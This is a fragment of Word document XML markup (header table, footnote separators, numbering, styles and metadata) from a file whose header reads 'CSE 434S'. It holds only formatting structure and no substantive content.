        <w:p w14:paraId="0DCF947D" w14:textId="79226E22" w:rsidR="0F38A9A9" w:rsidRDefault="0F38A9A9" w:rsidP="0F38A9A9">
          <w:pPr>
            <w:pStyle w:val="a6"/>
            <w:ind w:right="-115"/>
            <w:jc w:val="right"/>
          </w:pPr>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w14:paraId="7EF3BB3C" w14:textId="3F55A9B0" w:rsidR="0F38A9A9" w:rsidRDefault="0F38A9A9" w:rsidP="0F38A9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AEC7" w14:textId="77777777" w:rsidR="00455F82" w:rsidRDefault="00455F82">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0EE71CDB" w14:textId="77777777" w:rsidR="00455F82" w:rsidRDefault="00455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F38A9A9" w14:paraId="7E5510B6" w14:textId="77777777" w:rsidTr="0F38A9A9">
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="040F89B2" w14:textId="20D58A4B" w:rsidR="0F38A9A9" w:rsidRDefault="0F38A9A9" w:rsidP="0F38A9A9">
          <w:pPr>
            <w:pStyle w:val="a6"/>
            <w:ind w:left="-115"/>
            <w:rPr>
              <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
              <w:b/>
              <w:bCs/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="0F38A9A9">
            <w:rPr>
              <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:t>CSE 434S</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="1A9C2DBB" w14:textId="76510A7D" w:rsidR="0F38A9A9" w:rsidRDefault="0F38A9A9" w:rsidP="0F38A9A9">
          <w:pPr>
            <w:pStyle w:val="a6"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
              <w:b/>
              <w:bCs/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="72965233" w14:textId="2B9B0F8A" w:rsidR="0F38A9A9" w:rsidRDefault="0F38A9A9" w:rsidP="0F38A9A9">
          <w:pPr>
            <w:pStyle w:val="a6"/>
            <w:ind w:right="-115"/>
            <w:jc w:val="right"/>
            <w:rPr>
              <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
              <w:b/>
              <w:bCs/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w14:paraId="09BDAF4F" w14:textId="0718C018" w:rsidR="0F38A9A9" w:rsidRDefault="0F38A9A9" w:rsidP="0F38A9A9">
    <w:pPr>
      <w:pStyle w:val="a6"/>
      <w:rPr>
        <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>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B2C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2024680C"/>
    <w:lvl w:ilvl="0" w:tplc="0784A3C4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="3E1C448E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="7C56753A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="92CADA04">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="8A3EDD96">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="64D6F146">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="B9A6C868">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="B2DE863E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="80BE6E08">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="26B368EC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DE0E4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2950180">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="119426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8A9A9"/>
    <w:rsid w:val="00005C8E"/>
    <w:rsid w:val="00073504"/>
    <w:rsid w:val="000E5409"/>
    <w:rsid w:val="000E6F94"/>
    <w:rsid w:val="001179D2"/>
    <w:rsid w:val="00163126"/>
    <w:rsid w:val="00180EAF"/>
    <w:rsid w:val="00193574"/>
    <w:rsid w:val="002266D2"/>
    <w:rsid w:val="002364D6"/>
    <w:rsid w:val="003032DA"/>
    <w:rsid w:val="00437549"/>
    <w:rsid w:val="00455F82"/>
    <w:rsid w:val="004675EB"/>
    <w:rsid w:val="004A27D4"/>
    <w:rsid w:val="00566B5D"/>
    <w:rsid w:val="005C6492"/>
    <w:rsid w:val="005E29A2"/>
    <w:rsid w:val="00647D2F"/>
    <w:rsid w:val="00782FD6"/>
    <w:rsid w:val="00790A14"/>
    <w:rsid w:val="007D2DA6"/>
    <w:rsid w:val="007F6CF5"/>
    <w:rsid w:val="0088494E"/>
    <w:rsid w:val="008B3ED6"/>
    <w:rsid w:val="00913196"/>
    <w:rsid w:val="009368A5"/>
    <w:rsid w:val="00983572"/>
    <w:rsid w:val="009F6C1F"/>
    <w:rsid w:val="00BC21F4"/>
    <w:rsid w:val="00BE3C45"/>
    <w:rsid w:val="00C8616E"/>
    <w:rsid w:val="00CF6221"/>
    <w:rsid w:val="00D410DA"/>
    <w:rsid w:val="00D75942"/>
    <w:rsid w:val="00E7527C"/>
    <w:rsid w:val="00E85145"/>
    <w:rsid w:val="00EC11DD"/>
    <w:rsid w:val="00EC27C5"/>
    <w:rsid w:val="00ED3F36"/>
    <w:rsid w:val="00F770C9"/>
    <w:rsid w:val="0F38A9A9"/>
    <w:rsid w:val="507E28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BB24"/>
  <w15:docId w15:val="{BCC02E2F-1AC3-4C93-A61C-B7E63997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6"/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a6">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7"/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a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etsi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1688</Words>
  <Characters>9622</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bcgwak</cp:lastModifiedBy>
  <cp:revision>40</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-09-29T16:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-09-29T19:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>